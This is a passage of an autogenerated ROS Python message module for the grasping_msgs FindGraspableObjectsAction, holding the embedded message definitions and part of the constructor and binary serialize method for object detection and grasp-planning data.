# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
Header header
actionlib_msgs/GoalID goal_id
FindGraspableObjectsGoal goal
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
string frame_id
================================================================================
MSG: actionlib_msgs/GoalID
# The stamp should store the time at which this goal was requested.
# It is used by an action server when it tries to preempt all
# goals that were requested before a certain time
time stamp
# The id provides a way to associate feedback and
# result message with specific goal requests. The id
# specified must be unique.
string id
================================================================================
MSG: grasping_msgs/FindGraspableObjectsGoal
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
###########################################################
# This action is called for integrated object detection and
# grasp planning, such as in base_grasping_perception
# Set to false to disable grasp planning, returning only the objects found
bool plan_grasps
================================================================================
MSG: grasping_msgs/FindGraspableObjectsActionResult
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
Header header
actionlib_msgs/GoalStatus status
FindGraspableObjectsResult result
================================================================================
MSG: actionlib_msgs/GoalStatus
GoalID goal_id
uint8 status
uint8 PENDING = 0 # The goal has yet to be processed by the action server
uint8 ACTIVE = 1 # The goal is currently being processed by the action server
uint8 PREEMPTED = 2 # The goal received a cancel request after it started executing
# and has since completed its execution (Terminal State)
uint8 SUCCEEDED = 3 # The goal was achieved successfully by the action server (Terminal State)
uint8 ABORTED = 4 # The goal was aborted during execution by the action server due
# to some failure (Terminal State)
uint8 REJECTED = 5 # The goal was rejected by the action server without being processed,
# because the goal was unattainable or invalid (Terminal State)
uint8 PREEMPTING = 6 # The goal received a cancel request after it started executing
# and has not yet completed execution
uint8 RECALLING = 7 # The goal received a cancel request before it started executing,
# but the action server has not yet confirmed that the goal is canceled
uint8 RECALLED = 8 # The goal received a cancel request before it started executing
# and was successfully cancelled (Terminal State)
uint8 LOST = 9 # An action client can determine that a goal is LOST. This should not be
# sent over the wire by an action server
#Allow for the user to associate a string with GoalStatus for debugging
string text
================================================================================
MSG: grasping_msgs/FindGraspableObjectsResult
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
# Graspable objects found
GraspableObject[] objects
# Additional, non-graspable objects which may be support surfaces
Object[] support_surfaces
================================================================================
MSG: grasping_msgs/GraspableObject
###########################################################
# This message describes an object + grasp data
Object object
moveit_msgs/Grasp[] grasps
================================================================================
MSG: grasping_msgs/Object
###########################################################
# This message describes an object.
# Many of the geometric items below lack a stamp/frame_id,
# header stamp/frame_id should be used there
std_msgs/Header header
# An object might have a name
string name
# An object might have a known (named) support surface
string support_surface
# Objects might have properties, such as type/class, or color, etc.
ObjectProperty[] properties
###########################################################
# Objects have many possible descriptions
# The following are the possible description formats
# Perception modules often represent an object as a cluster of points
# Is considered valid if number of points > 0
sensor_msgs/PointCloud2 point_cluster
# MoveIt prefers solid primitives or meshes as a description of objects
shape_msgs/SolidPrimitive[] primitives
geometry_msgs/Pose[] primitive_poses
shape_msgs/Mesh[] meshes
geometry_msgs/Pose[] mesh_poses
# An object representing a support surface might be described by a plane
# Is considered valid if coefficients are not all 0s.
shape_msgs/Plane surface
================================================================================
MSG: grasping_msgs/ObjectProperty
###########################################################
# Other generic properties of an object
string name
string value
================================================================================
MSG: sensor_msgs/PointCloud2
# This message holds a collection of N-dimensional points, which may
# contain additional information such as normals, intensity, etc. The
# point data is stored as a binary blob, its layout described by the
# contents of the "fields" array.
# The point cloud data may be organized 2d (image-like) or 1d
# (unordered). Point clouds organized as 2d images may be produced by
# camera depth sensors such as stereo or time-of-flight.
# Time of sensor data acquisition, and the coordinate frame ID (for 3d
# points).
Header header
# 2D structure of the point cloud. If the cloud is unordered, height is
# 1 and width is the length of the point cloud.
uint32 height
uint32 width
# Describes the channels and their layout in the binary data blob.
PointField[] fields
bool is_bigendian # Is this data bigendian?
uint32 point_step # Length of a point in bytes
uint32 row_step # Length of a row in bytes
uint8[] data # Actual point data, size is (row_step*height)
bool is_dense # True if there are no invalid points
================================================================================
MSG: sensor_msgs/PointField
# This message holds the description of one point entry in the
# PointCloud2 message format.
uint8 INT8 = 1
uint8 UINT8 = 2
uint8 INT16 = 3
uint8 UINT16 = 4
uint8 INT32 = 5
uint8 UINT32 = 6
uint8 FLOAT32 = 7
uint8 FLOAT64 = 8
string name # Name of field
uint32 offset # Offset from start of point struct
uint8 datatype # Datatype enumeration, see above
uint32 count # How many elements in the field
================================================================================
MSG: shape_msgs/SolidPrimitive
# Define box, sphere, cylinder, cone
# All shapes are defined to have their bounding boxes centered around 0,0,0.
uint8 BOX=1
uint8 SPHERE=2
uint8 CYLINDER=3
uint8 CONE=4
# The type of the shape
uint8 type
# The dimensions of the shape
float64[] dimensions
# The meaning of the shape dimensions: each constant defines the index in the 'dimensions' array
# For the BOX type, the X, Y, and Z dimensions are the length of the corresponding
# sides of the box.
uint8 BOX_X=0
uint8 BOX_Y=1
uint8 BOX_Z=2
# For the SPHERE type, only one component is used, and it gives the radius of
# the sphere.
uint8 SPHERE_RADIUS=0
# For the CYLINDER and CONE types, the center line is oriented along
# the Z axis. Therefore the CYLINDER_HEIGHT (CONE_HEIGHT) component
# of dimensions gives the height of the cylinder (cone). The
# CYLINDER_RADIUS (CONE_RADIUS) component of dimensions gives the
# radius of the base of the cylinder (cone). Cone and cylinder
# primitives are defined to be circular. The tip of the cone is
# pointing up, along +Z axis.
uint8 CYLINDER_HEIGHT=0
uint8 CYLINDER_RADIUS=1
uint8 CONE_HEIGHT=0
uint8 CONE_RADIUS=1
================================================================================
MSG: geometry_msgs/Pose
# A representation of pose in free space, composed of position and orientation.
Point position
Quaternion orientation
================================================================================
MSG: geometry_msgs/Point
# This contains the position of a point in free space
float64 x
float64 y
float64 z
================================================================================
MSG: geometry_msgs/Quaternion
# This represents an orientation in free space in quaternion form.
float64 x
float64 y
float64 z
float64 w
================================================================================
MSG: shape_msgs/Mesh
# Definition of a mesh
# list of triangles; the index values refer to positions in vertices[]
MeshTriangle[] triangles
# the actual vertices that make up the mesh
geometry_msgs/Point[] vertices
================================================================================
MSG: shape_msgs/MeshTriangle
# Definition of a triangle's vertices
uint32[3] vertex_indices
================================================================================
MSG: shape_msgs/Plane
# Representation of a plane, using the plane equation ax + by + cz + d = 0
# a := coef[0]
# b := coef[1]
# c := coef[2]
# d := coef[3]
float64[4] coef
================================================================================
MSG: moveit_msgs/Grasp
# This message contains a description of a grasp that would be used
# with a particular end-effector to grasp an object, including how to
# approach it, grip it, etc. This message does not contain any
# information about a "grasp point" (a position ON the object).
# Whatever generates this message should have already combined
# information about grasp points with information about the geometry
# of the end-effector to compute the grasp_pose in this message.
# A name for this grasp
string id
# The internal posture of the hand for the pre-grasp
# only positions are used
trajectory_msgs/JointTrajectory pre_grasp_posture
# The internal posture of the hand for the grasp
# positions and efforts are used
trajectory_msgs/JointTrajectory grasp_posture
# The position of the end-effector for the grasp. This is the pose of
# the "parent_link" of the end-effector, not actually the pose of any
# link *in* the end-effector. Typically this would be the pose of the
# most distal wrist link before the hand (end-effector) links began.
geometry_msgs/PoseStamped grasp_pose
# The estimated probability of success for this grasp, or some other
# measure of how "good" it is.
float64 grasp_quality
# The approach direction to take before picking an object
GripperTranslation pre_grasp_approach
# The retreat direction to take after a grasp has been completed (object is attached)
GripperTranslation post_grasp_retreat
# The retreat motion to perform when releasing the object; this information
# is not necessary for the grasp itself, but when releasing the object,
# the information will be necessary. The grasp used to perform a pickup
# is returned as part of the result, so this information is available for
# later use.
GripperTranslation post_place_retreat
# the maximum contact force to use while grasping (<=0 to disable)
float32 max_contact_force
# an optional list of obstacles that we have semantic information about
# and that can be touched/pushed/moved in the course of grasping
string[] allowed_touch_objects
================================================================================
MSG: trajectory_msgs/JointTrajectory
Header header
string[] joint_names
JointTrajectoryPoint[] points
================================================================================
MSG: trajectory_msgs/JointTrajectoryPoint
# Each trajectory point specifies either positions[, velocities[, accelerations]]
# or positions[, effort] for the trajectory to be executed.
# All specified values are in the same order as the joint names in JointTrajectory.msg
float64[] positions
float64[] velocities
float64[] accelerations
float64[] effort
duration time_from_start
================================================================================
MSG: geometry_msgs/PoseStamped
# A Pose with reference coordinate frame and timestamp
Header header
Pose pose
================================================================================
MSG: moveit_msgs/GripperTranslation
# defines a translation for the gripper, used in pickup or place tasks
# for example for lifting an object off a table or approaching the table for placing
# the direction of the translation
geometry_msgs/Vector3Stamped direction
# the desired translation distance
float32 desired_distance
# the min distance that must be considered feasible before the
# grasp is even attempted
float32 min_distance
================================================================================
MSG: geometry_msgs/Vector3Stamped
# This represents a Vector3 with reference coordinate frame and timestamp
Header header
Vector3 vector
================================================================================
MSG: geometry_msgs/Vector3
# This represents a vector in free space.
# It is only meant to represent a direction. Therefore, it does not
# make sense to apply a translation to it (e.g., when applying a
# generic rigid transformation to a Vector3, tf2 will only apply the
# rotation). If you want your data to be translatable too, use the
# geometry_msgs/Point message instead.
float64 x
float64 y
float64 z
================================================================================
MSG: grasping_msgs/FindGraspableObjectsActionFeedback
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
Header header
actionlib_msgs/GoalStatus status
FindGraspableObjectsFeedback feedback
================================================================================
MSG: grasping_msgs/FindGraspableObjectsFeedback
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
# Publish objects as they are detected and grasp planned
GraspableObject object
"""
__slots__ = ['action_goal','action_result','action_feedback']
_slot_types = ['grasping_msgs/FindGraspableObjectsActionGoal','grasping_msgs/FindGraspableObjectsActionResult','grasping_msgs/FindGraspableObjectsActionFeedback']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
action_goal,action_result,action_feedback
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(FindGraspableObjectsAction, self).__init__(*args, **kwds)
# message fields cannot be None, assign default values for those that are
if self.action_goal is None:
self.action_goal = grasping_msgs.msg.FindGraspableObjectsActionGoal()
if self.action_result is None:
self.action_result = grasping_msgs.msg.FindGraspableObjectsActionResult()
if self.action_feedback is None:
self.action_feedback = grasping_msgs.msg.FindGraspableObjectsActionFeedback()
else:
self.action_goal = grasping_msgs.msg.FindGraspableObjectsActionGoal()
self.action_result = grasping_msgs.msg.FindGraspableObjectsActionResult()
self.action_feedback = grasping_msgs.msg.FindGraspableObjectsActionFeedback()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.action_goal.header.seq, _x.action_goal.header.stamp.secs, _x.action_goal.header.stamp.nsecs))
_x = self.action_goal.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_2I().pack(_x.action_goal.goal_id.stamp.secs, _x.action_goal.goal_id.stamp.nsecs))
_x = self.action_goal.goal_id.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_B3I().pack(_x.action_goal.goal.plan_grasps, _x.action_result.header.seq, _x.action_result.header.stamp.secs, _x.action_result.header.stamp.nsecs))
_x = self.action_result.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_2I().pack(_x.action_result.status.goal_id.stamp.secs, _x.action_result.status.goal_id.stamp.nsecs))
_x = self.action_result.status.goal_id.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self.action_result.status.status
buff.write(_get_struct_B().pack(_x))
_x = self.action_result.status.text
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(self.action_result.result.objects)
buff.write(_struct_I.pack(length))
for val1 in self.action_result.result.objects:
_v1 = val1.object
_v2 = _v1.header
_x = _v2.seq
buff.write(_get_struct_I().pack(_x))
_v3 = _v2.stamp
_x = _v3
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v2.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = _v1.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = _v1.support_surface
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(_v1.properties)
buff.write(_struct_I.pack(length))
for val3 in _v1.properties:
_x = val3.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val3.value
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v4 = _v1.point_cluster
_v5 = _v4.header
_x = _v5.seq
buff.write(_get_struct_I().pack(_x))
_v6 = _v5.stamp
_x = _v6
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v5.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = _v4
buff.write(_get_struct_2I().pack(_x.height, _x.width))
length = len(_v4.fields)
buff.write(_struct_I.pack(length))
for val4 in _v4.fields:
_x = val4.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val4
buff.write(_get_struct_IBI().pack(_x.offset, _x.datatype, _x.count))
_x = _v4
buff.write(_get_struct_B2I().pack(_x.is_bigendian, _x.point_step, _x.row_step))
_x = _v4.data
length = len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))
else:
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = _v4.is_dense
buff.write(_get_struct_B().pack(_x))
length = len(_v1.primitives)
buff.write(_struct_I.pack(length))
for val3 in _v1.primitives:
_x = val3.type
buff.write(_get_struct_B().pack(_x))
length = len(val3.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val3.dimensions))
length = len(_v1.primitive_poses)
buff.write(_struct_I.pack(length))
for val3 in _v1.primitive_poses:
_v7 = val3.position
_x = _v7
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v8 = val3.orientation
_x = _v8
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
length = len(_v1.meshes)
buff.write(_struct_I.pack(length))
for val3 in _v1.meshes:
length = len(val3.triangles)
buff.write(_struct_I.pack(length))
for val4 in val3.triangles:
buff.write(_get_struct_3I().pack(*val4.vertex_indices))
length = len(val3.vertices)
buff.write(_struct_I.pack(length))
for val4 in val3.vertices:
_x = val4
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
length = len(_v1.mesh_poses)
buff.write(_struct_I.pack(length))
for val3 in _v1.mesh_poses:
_v9 = val3.position
_x = _v9
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v10 = val3.orientation
_x = _v10
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
_v11 = _v1.surface
buff.write(_get_struct_4d().pack(*_v11.coef))
length = len(val1.grasps)
buff.write(_struct_I.pack(length))
for val2 in val1.grasps:
_x = val2.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v12 = val2.pre_grasp_posture
_v13 = _v12.header
_x = _v13.seq
buff.write(_get_struct_I().pack(_x))
_v14 = _v13.stamp
_x = _v14
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v13.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(_v12.joint_names)
buff.write(_struct_I.pack(length))
for val4 in _v12.joint_names:
length = len(val4)
if python3 or type(val4) == unicode:
val4 = val4.encode('utf-8')
length = len(val4)
buff.write(struct.Struct('<I%ss'%length).pack(length, val4))
length = len(_v12.points)
buff.write(_struct_I.pack(length))
for val4 in _v12.points:
length = len(val4.positions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val4.positions))
length = len(val4.velocities)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val4.velocities))
length = len(val4.accelerations)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val4.accelerations))
length = len(val4.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val4.effort))
_v15 = val4.time_from_start
_x = _v15
buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
_v16 = val2.grasp_posture
_v17 = _v16.header
_x = _v17.seq
buff.write(_get_struct_I().pack(_x))
_v18 = _v17.stamp
_x = _v18
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v17.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(_v16.joint_names)
buff.write(_struct_I.pack(length))
for val4 in _v16.joint_names:
length = len(val4)
if python3 or type(val4) == unicode:
val4 = val4.encode('utf-8')
length = len(val4)
buff.write(struct.Struct('<I%ss'%length).pack(length, val4))
length = len(_v16.points)
buff.write(_struct_I.pack(length))
for val4 in _v16.points:
length = len(val4.positions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val4.positions))
length = len(val4.velocities)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val4.velocities))
length = len(val4.accelerations)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val4.accelerations))
length = len(val4.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val4.effort))
_v19 = val4.time_from_start
_x = _v19
buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
_v20 = val2.grasp_pose
_v21 = _v20.header
_x = _v21.seq
buff.write(_get_struct_I().pack(_x))
_v22 = _v21.stamp
_x = _v22
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v21.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v23 = _v20.pose
_v24 = _v23.position
_x = _v24
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v25 = _v23.orientation
_x = _v25
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
_x = val2.grasp_quality
buff.write(_get_struct_d().pack(_x))
_v26 = val2.pre_grasp_approach
_v27 = _v26.direction
_v28 = _v27.header
_x = _v28.seq
buff.write(_get_struct_I().pack(_x))
_v29 = _v28.stamp
_x = _v29
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v28.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v30 = _v27.vector
_x = _v30
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_x = _v26
buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
_v31 = val2.post_grasp_retreat
_v32 = _v31.direction
_v33 = _v32.header
_x = _v33.seq
buff.write(_get_struct_I().pack(_x))
_v34 = _v33.stamp
_x = _v34
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v33.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v35 = _v32.vector
_x = _v35
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_x = _v31
buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
_v36 = val2.post_place_retreat
_v37 = _v36.direction
_v38 = _v37.header
_x = _v38.seq
buff.write(_get_struct_I().pack(_x))
_v39 = _v38.stamp
_x = _v39
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v38.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v40 = _v37.vector
_x = _v40
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_x = _v36
buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
_x = val2.max_contact_force
buff.write(_get_struct_f().pack(_x))
length = len(val2.allowed_touch_objects)
buff.write(_struct_I.pack(length))
for val3 in val2.allowed_touch_objects:
length = len(val3)
if python3 or type(val3) == unicode:
val3 = val3.encode('utf-8')
length = len(val3)
buff.write(struct.Struct('<I%ss'%length).pack(length, val3))
length = len(self.action_result.result.support_surfaces)
buff.write(_struct_I.pack(length))
for val1 in self.action_result.result.support_surfaces:
_v41 = val1.header
_x = _v41.seq
buff.write(_get_struct_I().pack(_x))
_v42 = _v41.stamp
_x = _v42
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v41.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val1.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val1.support_surface
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(val1.properties)
buff.write(_struct_I.pack(length))
for val2 in val1.properties:
_x = val2.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val2.value
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v43 = val1.point_cluster
_v44 = _v43.header
_x = _v44.seq
buff.write(_get_struct_I().pack(_x))
_v45 = _v44.stamp
_x = _v45
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v44.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = _v43
buff.write(_get_struct_2I().pack(_x.height, _x.width))
length = len(_v43.fields)
buff.write(_struct_I.pack(length))
for val3 in _v43.fields:
_x = val3.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val3
buff.write(_get_struct_IBI().pack(_x.offset, _x.datatype, _x.count))
_x = _v43
buff.write(_get_struct_B2I().pack(_x.is_bigendian, _x.point_step, _x.row_step))
_x = _v43.data
length = len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))
else:
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = _v43.is_dense
buff.write(_get_struct_B().pack(_x))
length = len(val1.primitives)
buff.write(_struct_I.pack(length))
for val2 in val1.primitives:
_x = val2.type
buff.write(_get_struct_B().pack(_x))
length = len(val2.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.Struct(pattern).pack(*val2.dimensions))
length = len(val1.primitive_poses)
buff.write(_struct_I.pack(length))
for val2 in val1.primitive_poses:
_v46 = val2.position
_x = _v46
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v47 = val2.orientation
_x = _v47
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
length = len(val1.meshes)
buff.write(_struct_I.pack(length))
for val2 in val1.meshes:
length = len(val2.triangles)
buff.write(_struct_I.pack(length))
for val3 in val2.triangles:
buff.write(_get_struct_3I().pack(*val3.vertex_indices))
length = len(val2.vertices)
buff.write(_struct_I.pack(length))
for val3 in val2.vertices:
_x = val3
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
length = len(val1.mesh_poses)
buff.write(_struct_I.pack(length))
for val2 in val1.mesh_poses:
_v48 = val2.position
_x = _v48
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v49 = val2.orientation
_x = _v49
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
_v50 = val1.surface
buff.write(_get_struct_4d().pack(*_v50.coef))
_x = self
buff.write(_get_struct_3I().pack(_x.action_feedback.header.seq, _x.action_feedback.header.stamp.secs, _x.action_feedback.header.stamp.nsecs))
_x = self.action_feedback.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_2I().pack(_x.action_feedback.status.goal_id.stamp.secs, _x.action_feedback.status.goal_id.stamp.nsecs))
_x = self.action_feedback.status.goal_id.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self.action_feedback.status.status
buff.write(_get_struct_B().pack(_x))
_x = self.action_feedback.status.text
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_3I().pack(_x.action_feedback.feedback.object.object.header.seq, _x.action_feedback.feedback.object.object.header.stamp.secs, _x.action_feedback.feedback.object.object.header.stamp.nsecs))
_x = self.action_feedback.feedback.object.object.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self.action_feedback.feedback.object.object.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self.action_feedback.feedback.object.object.support_surface
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(self.action_feedback.feedback.object.object.properties)
buff.write(_struct_I.pack(length))
for val1 in self.action_feedback.feedback.object.object.properties:
_x = val1.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val1.value
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_3I().pack(_x.action_feedback.feedback.object.object.point_cluster.header.seq, _x.action_feedback.feedback.object.object.point_cluster.header.stamp.secs, _x.action_feedback.feedback.object.object.point_cluster.header.stamp.nsecs))
_x = self.action_feedback.feedback.object.object.point_cluster.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_2I().pack(_x.action_feedback.feedback.object.object.point_cluster.height, _x.action_feedback.feedback.object.object.point_cluster.width))
length = len(self.action_feedback.feedback.object.object.point_cluster.fields)
buff.write(_struct_I.pack(length))
for val1 in self.action_feedback.feedback.object.object.point_cluster.fields:
_x = val1.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val1
buff.write(_get_struct_IBI().pack(_x.offset, _x.datatype, _x.count))
_x = self
buff.write(_get_struct_B2I().pack(_x.action_feedback.feedback.object.object.point_cluster.is_bigendian, _x.action_feedback.feedback.object.object.point_cluster.point_step, _x.action_feedback.feedback.object.object.point_cluster.row_step))
_x = self.action_feedback.feedback.object.object.point_cluster.data
length = len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))
else:
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
